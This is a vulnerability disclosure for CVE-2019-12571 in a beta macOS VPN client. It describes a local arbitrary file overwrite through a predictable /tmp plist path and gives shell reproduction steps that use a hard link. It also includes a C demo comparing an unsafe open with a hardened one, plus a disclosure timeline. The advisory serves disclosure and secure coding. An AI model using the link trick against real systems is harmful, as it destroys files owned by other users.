security-research/vulnerabilities/PIA/CVE-2019-12571.txt
Title: PIA Beta macOS Arbitrary File Overwrite
Author: Rich Mirch
CVE: CVE-2019-12571
Vendor Advisory: N/A

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client
v0.9.8 beta (build 02099) for macOS could allow an authenticated, local attacker to
overwrite arbitrary files.

When the client initiates a connection, the XML /tmp/pia-watcher.plist file is created.
If the file exists, it will be truncated and the contents completely overwritten.
This file is removed on disconnect. An unprivileged user can create a hard or soft
link to arbitrary files owned by any user on the system, including root. This creates
a denial of service condition and possible data loss if leveraged by a malicious local user.

CVSS

Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:H/RL:U/RC:C
Base: 7.1
Temporal: 7.1

Test Environment

OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v0.9.8 beta (build 02099)

Steps to reproduce

All steps are executed as a low privileged user.

macbook:~ test2$ id
uid=508(test2) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),704(com.apple.sharepoint.group.4),100(_lpoperator),701(com.apple.sharepoint.group.1),333(piavpn),703(com.apple.sharepoint.group.3),702(com.apple.sharepoint.group.2)

Step 1 - Create a root owned test file with permissions 600.

bash-3.2# echo "this is a test" > /etc/test.file
bash-3.2# chmod 600 /etc/test.file
bash-3.2# ls -ld /etc/test.file
-rw------- 1 root wheel 15 Dec 27 10:14 /etc/test.file

Step 2 - Show that test2 does not have permission to write to /etc/test.file.

macbook:~ test2$ echo test > /etc/test.file
-bash: /etc/test.file: Permission denied

Step 3 - Create a hard or soft link to a root owned file.

macbook:~ test2$ ln /etc/test.file /tmp/pia-watcher.plist
macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist
12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /etc/test.file
12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /tmp/pia-watcher.plist

Step 4 - Open the PIA client and connect. The file will be overwritten with the XML plist.

macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist
ls: /tmp/pia-watcher.plist: No such file or directory
12888119231 -rw------- 1 root wheel 801 Dec 27 10:17 /etc/test.file

Step 5 - As root, display the contents of /etc/test.file.

bash-3.2# cat /etc/test.file
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.privateinternetaccess.vpn.watcher</string>
<key>ProgramArguments</key>
<array>
<string>/Applications/Private Internet Access.app/Contents/MacOS/pia-openvpn-helper</string>
</array>
<key>EnvironmentVariables</key>
<dict>
<key>script_type</key>
<string>watch-notify</string>
</dict>
<key>StandardErrorPath</key>
<string>/Library/Application Support/com.privateinternetaccess.vpn/watcher.log</string>
<key>WatchPaths</key>
<array>
<string>/Library/Preferences/SystemConfiguration</string>
</array>
</dict>
</plist>
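The root cause described above and reproduced in steps 1-5 is a privileged process opening a fixed, attacker-controllable path in /tmp with O_TRUNC. The following is an added illustration, not code from the advisory or from PIA: it places the naive open next to a hardened one (O_EXCL, O_NOFOLLOW, then an fstat sanity check) and replays step 3 against both inside a private temp directory, entirely as the current user. All file names and the victim contents are constructed for the demo.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: a fixed path opened with O_TRUNC.
 * If a link was planted at `path`, whatever it points to is truncated. */
int unsafe_create(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened variant: refuse anything already present at `path` (O_EXCL),
 * never follow a symlink (O_NOFOLLOW), and confirm the new fd really is a
 * regular file with a single link before using it. Returns an fd or -1. */
int safe_create(const char *path) {
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;                /* EEXIST or ELOOP: something was planted */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd); unlink(path); return -1;
    }
    return fd;
}

/* Constructed scenario mirroring step 3: a 15-byte victim file is hard-linked
 * to the watcher path in a private temp dir, then `opener` is run on the link.
 * Returns the victim's size afterwards, or -1 if the setup itself failed. */
off_t victim_size_after(int (*opener)(const char *)) {
    char dir[] = "/tmp/pia-demo-XXXXXX", target[64], watcher[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/test.file", dir);
    snprintf(watcher, sizeof watcher, "%s/pia-watcher.plist", dir);
    int fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "this is a test\n", 15) != 15) return -1;
    close(fd);
    if (link(target, watcher) < 0) return -1;     /* the attacker's `ln` */
    if ((fd = opener(watcher)) >= 0) close(fd);
    off_t size = stat(target, &st) == 0 ? st.st_size : -1;
    unlink(watcher); unlink(target); rmdir(dir);
    return size;
}

int main(void) {
    printf("naive open:    victim is %lld bytes\n", (long long)victim_size_after(unsafe_create));
    printf("hardened open: victim is %lld bytes\n", (long long)victim_size_after(safe_create));
    return 0;
}
```

The naive open reports 0 bytes (the victim was truncated through the link) while the hardened open leaves it at 15. The stronger fix is to keep such state files out of world-writable directories altogether, in a root-owned directory the helper creates itself.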

Timeline:

2018-12-27: Reported to vendor
2018-12-27: Vendor acknowledged receipt of report
2019-01-18: Vendor states a fix will be available in v83; however, this version was never released.
            The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure